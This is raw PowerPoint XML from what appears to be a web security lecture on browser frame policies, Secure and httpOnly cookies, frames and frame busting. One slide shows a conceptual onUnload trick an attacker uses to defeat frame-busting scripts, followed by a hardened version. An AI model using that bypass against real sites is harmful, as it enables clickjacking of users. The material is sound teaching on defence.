              <a:t>  of the vulnerabilities on previous graph: XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, CSRF, …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1" name="Group 4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810003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Browser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Policy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IE7 (no Flash)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Descendant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IE7 (with Flash)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Descendant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Firefox 3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Descendant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Safari 3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Descendant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Opera 9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(many policies)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</a:endParaRP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HTML 5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Descendant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8156" name="Picture 62" descr="safa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75" y="3810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7" name="Picture 64" descr="firef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488" y="3297238"/>
            <a:ext cx="5334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8" name="Picture 65" descr="ope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" y="4410075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9" name="Picture 70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" y="4876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0" name="Picture 130" descr="ie-6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7375" y="2181225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565150" y="2713038"/>
            <a:ext cx="654050" cy="544512"/>
            <a:chOff x="356" y="1652"/>
            <a:chExt cx="412" cy="343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48163" name="Picture 71" descr="ie-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6" y="1652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64" name="Picture 20" descr="flashjava"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect r="52881"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="548" y="1755"/>
              <a:ext cx="22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162" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096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en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adoption of Descendant Policy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/>
              <a:t>Secure Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423364" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="1692275"/>
            <a:ext cx="1128713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365" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1792288"/>
            <a:ext cx="9144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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423366" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2530475"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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367" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2759075"/>
            <a:ext cx="1143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368" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2525713"/>
            <a:ext cx="400050" cy="385762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252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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423369" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1616075"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423370" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="20732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423371" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3705225" y="1600200"/>
            <a:ext cx="93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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423372" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="23018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423373" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2362200"/>
            <a:ext cx="48006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HTTP Header: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Set-cookie:	NAME=VALUE ;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	Secure=true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423374" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3765550"/>
            <a:ext cx="7772400" cy="257492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  Provides confidentiality against network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  Browser will only send cookie back over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  … but no integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  Can rewrite secure cookies over HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> network attacker can rewrite secure cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> can log user into attacker’s account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538" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="2157413" cy="5334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553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/>
              <a:t>httpOnly Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="1692275"/>
            <a:ext cx="1128713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5542" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1792288"/>
            <a:ext cx="9144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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345543" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2530475"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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5544" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2759075"/>
            <a:ext cx="1143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5545" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2525713"/>
            <a:ext cx="400050" cy="385762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252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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45546" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1616075"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345547" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="20732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45548" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3705225" y="1600200"/>
            <a:ext cx="93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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345549" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="23018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45550" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2362200"/>
            <a:ext cx="48006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HTTP Header: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Set-cookie:	NAME=VALUE ;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	httpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3898900"/>
            <a:ext cx="8022453" cy="2529923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 dirty="0"/>
              <a:t>  Cookie sent over HTTP(s),  but not accessible to scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  cannot be read via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  Helps prevent cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> …  but does not stop most other risks of XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>bugs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Frames and frame busting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394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2164140"/>
            <a:ext cx="7010400" cy="15696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algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"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sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>myframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=“http://www.google.com/”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	       This text is ignored by most browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14673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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146739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001000" cy="1791260"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embed HTML documents in other documents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467397" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="4106139"/>
          <a:ext cx="4343400" cy="2193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Image" r:id="rId3" imgW="3873016" imgH="1955556" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId3" imgW="3873016" imgH="1955556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106139"/>
                        <a:ext cx="4343400" cy="2193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739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8418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31662" r="77435" b="47917"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3081338"/>
            <a:ext cx="243840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684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Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146842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305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Goal:  prevent web page from loading in a frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>example: opening login page in a frame will display</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>correct passmark image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Frame busting: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468421" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4724826"/>
            <a:ext cx="5427255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dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>if   (top != self)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>top.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>location.href</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14694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Problem:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>OnUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> event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 smtClean="0"/>
              <a:t>Try this instead:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="958366" y="2817168"/>
            <a:ext cx="7119321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dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cause_an_abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>;)"&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4410943"/>
            <a:ext cx="5427255" cy="13111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dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>if   (top != self)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>top.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>location.href</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>else {  …  code of page here …}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95"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{46B31AD6-B944-4F9C-84AF-4B8F5BA0C400}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14643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  END</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1464325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Image Tags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7600" y="6616700"/>
            <a:ext cx="355600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06E595C-B8A9-4129-BDA4-5CF617B3E06C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43013" name="Picture 4" descr="beach suns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114800"/>
            <a:ext cx="25273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57400" y="5029200"/>
            <a:ext cx="3352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chemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Displays this nice picture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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Security issues?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600200"/>
            <a:ext cx="8251939" cy="181588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lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
